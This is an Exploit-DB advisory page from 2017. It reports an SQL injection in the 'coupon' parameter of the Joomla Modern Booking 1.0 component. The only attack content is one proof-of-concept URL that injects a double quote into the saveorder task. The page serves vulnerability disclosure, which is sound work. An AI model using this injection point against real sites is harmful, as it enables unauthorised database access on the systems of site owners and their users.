Joomla! Component Modern Booking 1.0 - 'coupon' SQL Injection

EDB-ID:

41673

CVE:

N/A

EDB Verified:

Author:

Hamed Izadi

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2017-03-22

Vulnerable App:

###############################################################################################
# Exploit Title: Joomla Modern Booking  - SQL Injection

               # Author: [ Hamed Izadi ]

                        #IRAN

# Vendor Homepage :
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/modern-booking/
# Vendor Homepage : https://www.unikalus.com/
# Category: [ Webapps ]
# Tested on: [ Ubuntu ]
# Versions: 1.0
# Date: March 22, 2017


# PoC:
# coupon Parameter Vulnerable To SQLi

# Demo:
# https://server/modern-booking-slots?task=saveorder&coupon=test"&start=&option=com_modern_booking


#  L u Arg
###############################################################################################

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services